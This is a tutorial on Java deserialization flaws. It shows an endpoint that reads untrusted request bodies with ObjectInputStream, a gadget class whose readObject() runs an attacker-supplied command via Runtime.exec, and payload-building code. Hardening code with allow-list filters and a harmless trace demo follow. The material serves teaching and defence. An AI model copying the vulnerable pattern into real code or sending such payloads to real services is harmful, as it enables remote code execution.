== The Simplest Exploit

=== Vulnerable code

The following is a well-known example of a Java deserialization vulnerability: an `ObjectInputStream` is opened directly on the body of an incoming request and read without any check on what the stream contains.

[source,java]
----
// request is e.g. an HttpServletRequest whose body is fully attacker-controlled
InputStream is = request.getInputStream();
// Nothing inspects the stream before deserialization starts
ObjectInputStream ois = new ObjectInputStream(is);
// readObject() fully reconstructs whatever object the stream describes; the cast runs afterwards
AcmeObject acme = (AcmeObject) ois.readObject();
----

The code expects an `AcmeObject`, but `readObject()` runs to completion before the cast occurs. `ObjectInputStream` reads the class name from the stream, instantiates that class and runs its deserialization logic; only then does the `(AcmeObject)` cast fail with a `ClassCastException`, by which time any side effects have already happened.

If an attacker finds a serializable class on the application's classpath whose `readObject()` method performs dangerous operations, they can serialize an instance of that class and send it, forcing the vulnerable application to perform those actions.

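As an added example (not code from the original page), here is the same endpoint hardened in two ways so that any class the application does not expect is rejected before its instance is created, which is the only point at which a malicious `readObject()` can still be prevented from running. `AcmeObject` stands in for the page's expected type, `Unexpected` stands in for any gadget an attacker might send, and the method names are assumptions made for this demonstration.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.ObjectStreamClass;
import java.io.Serializable;
import java.util.Set;

public class SafeDeserialization {

    // Stand-in for the page's AcmeObject: the one type the endpoint legitimately expects.
    public static final class AcmeObject implements Serializable {
        private static final long serialVersionUID = 1L;
        long orderId;
    }

    // Any other Serializable class; here it represents the gadget an attacker would send instead.
    public static final class Unexpected implements Serializable {
        private static final long serialVersionUID = 1L;
    }

    // Allow-list of classes the stream may contain. Keep it as small as the protocol permits.
    private static final Set<String> ALLOWED = Set.of(AcmeObject.class.getName());

    // Variant 1 (Java 9+, JEP 290): an ObjectInputFilter is consulted for every class descriptor
    // *before* an instance is created, so a gadget's readObject() never gets to run.
    static AcmeObject readWithFilter(InputStream is) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(is);
        ois.setObjectInputFilter(info -> {
            if (info.serialClass() == null) {
                // depth / reference-count / stream-size checks carry no class; leave them to defaults
                return ObjectInputFilter.Status.UNDECIDED;
            }
            return ALLOWED.contains(info.serialClass().getName())
                    ? ObjectInputFilter.Status.ALLOWED
                    : ObjectInputFilter.Status.REJECTED;
        });
        return (AcmeObject) ois.readObject();
    }

    // Variant 2 (works on older JDKs): "look-ahead" deserialization. resolveClass() receives the
    // class descriptor before instantiation, so rejecting here is still free of side effects.
    static AcmeObject readWithLookAhead(InputStream is) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(is) {
            @Override
            protected Class<?> resolveClass(ObjectStreamClass desc)
                    throws IOException, ClassNotFoundException {
                if (!ALLOWED.contains(desc.getName())) {
                    throw new InvalidClassException(desc.getName(), "unauthorized deserialization attempt");
                }
                return super.resolveClass(desc);
            }
        };
        return (AcmeObject) ois.readObject();
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    public static void main(String[] args) throws Exception {
        AcmeObject legit = new AcmeObject();
        legit.orderId = 42;
        byte[] good = serialize(legit);            // what the application expects to receive
        byte[] bad = serialize(new Unexpected());  // what an attacker would send instead

        System.out.println("filter, good input:    " + readWithFilter(new ByteArrayInputStream(good)).orderId);
        System.out.println("lookahead, good input: " + readWithLookAhead(new ByteArrayInputStream(good)).orderId);

        for (String variant : new String[] {"filter", "lookahead"}) {
            try {
                if (variant.equals("filter")) {
                    readWithFilter(new ByteArrayInputStream(bad));
                } else {
                    readWithLookAhead(new ByteArrayInputStream(bad));
                }
                System.out.println(variant + ", bad input: NOT rejected");
            } catch (InvalidClassException e) {
                // Both variants reject the stream before Unexpected is ever instantiated.
                System.out.println(variant + ", bad input: rejected (" + e.getMessage() + ")");
            }
        }
    }
}
```

Run it with `java SafeDeserialization.java` (single-file mode, Java 11+). The filter variant is preferable where the JDK supports it, and the same allow-list can be enforced process-wide through the `jdk.serialFilter` system property so that third-party code calling `readObject()` is covered as well. Both variants only restrict which classes may be instantiated; the robust fix remains not to pass Java serialization streams across a trust boundary at all.
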
=== Class included in ClassPath

Attackers need to find a class on the application's classpath that is serializable and whose `readObject()` implementation performs a dangerous operation. Such a class is called a gadget; the simplest possible one looks like this.

[source,java]
----
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;

public class GadgetObject implements Serializable {
    // Attacker-controlled field, restored from the stream before exec() runs
    String cmd;

    // Deserialization hook: the JVM calls it while reading the stream, before the caller sees the object
    private void readObject(ObjectInputStream stream) throws IOException, ClassNotFoundException {
        stream.defaultReadObject(); // populate cmd from the serialized bytes
        Runtime.getRuntime().exec(cmd);
    }
}
----

=== Exploit

If a class like the one shown above is present on the target's classpath, the attacker serializes an instance of it carrying the command of their choice and sends the resulting bytes as the request body. The target JVM reconstructs the `GadgetObject`, runs its `readObject()`, and the command executes: remote code execution without the target ever receiving attacker code, only data. The attacker needs a copy of the class only locally, to compile the payload generator against.

[source,java]
----
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;

GadgetObject go = new GadgetObject();
go.cmd = "touch /tmp/pwned.txt"; // the command the victim JVM will run

// Standard Java serialization produces the payload; no special tooling is needed
ByteArrayOutputStream bos = new ByteArrayOutputStream();
ObjectOutputStream oos = new ObjectOutputStream(bos);
oos.writeObject(go);
oos.flush();
// Send these bytes as the request body to the vulnerable endpoint
byte[] exploit = bos.toByteArray();
----
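
The following end-to-end demonstration (added here, not part of the original page) puts the attacker side and the victim side of the previous sections together and makes the order of events visible. `GadgetObject` is a harmless stand-in: where the page's gadget calls `Runtime.exec(cmd)`, this one records the command in a list so the program can be run safely; `AcmeObject`, the trace list and the method names are assumptions made for this demonstration.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.util.ArrayList;
import java.util.List;

public class ExploitDemo {

    // Records what happened, in order, so it can be inspected after the fact (assumed helper).
    static final List<String> TRACE = new ArrayList<>();

    // What the vulnerable endpoint expects to receive.
    public static final class AcmeObject implements Serializable {
        private static final long serialVersionUID = 1L;
    }

    // Harmless stand-in for the page's GadgetObject: identical shape, but instead of
    // Runtime.exec(cmd) it records the command it would have run.
    public static final class GadgetObject implements Serializable {
        private static final long serialVersionUID = 1L;
        String cmd;

        private void readObject(ObjectInputStream stream) throws IOException, ClassNotFoundException {
            stream.defaultReadObject(); // restores cmd from the stream
            TRACE.add("readObject() ran; would exec: " + cmd);
        }
    }

    // Attacker side: builds the payload exactly as the page's exploit snippet does.
    static byte[] buildPayload(String cmd) throws IOException {
        GadgetObject go = new GadgetObject();
        go.cmd = cmd;
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(go);
        }
        return bos.toByteArray();
    }

    // Victim side: the page's vulnerable pattern, unchanged in behaviour.
    static AcmeObject vulnerableEndpoint(byte[] body) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(body));
        return (AcmeObject) ois.readObject(); // readObject() completes first, then the cast fails
    }

    public static void main(String[] args) throws Exception {
        byte[] exploit = buildPayload("touch /tmp/pwned.txt");
        try {
            vulnerableEndpoint(exploit);
        } catch (ClassCastException e) {
            TRACE.add("ClassCastException: " + e.getMessage());
        }
        TRACE.forEach(System.out::println);
    }
}
```

The trace printed at the end shows the gadget's `readObject()` entry first and the `ClassCastException` second: the victim's cast to `AcmeObject` does fail, but only after the gadget has already done its work, which is exactly why the cast offers no protection.
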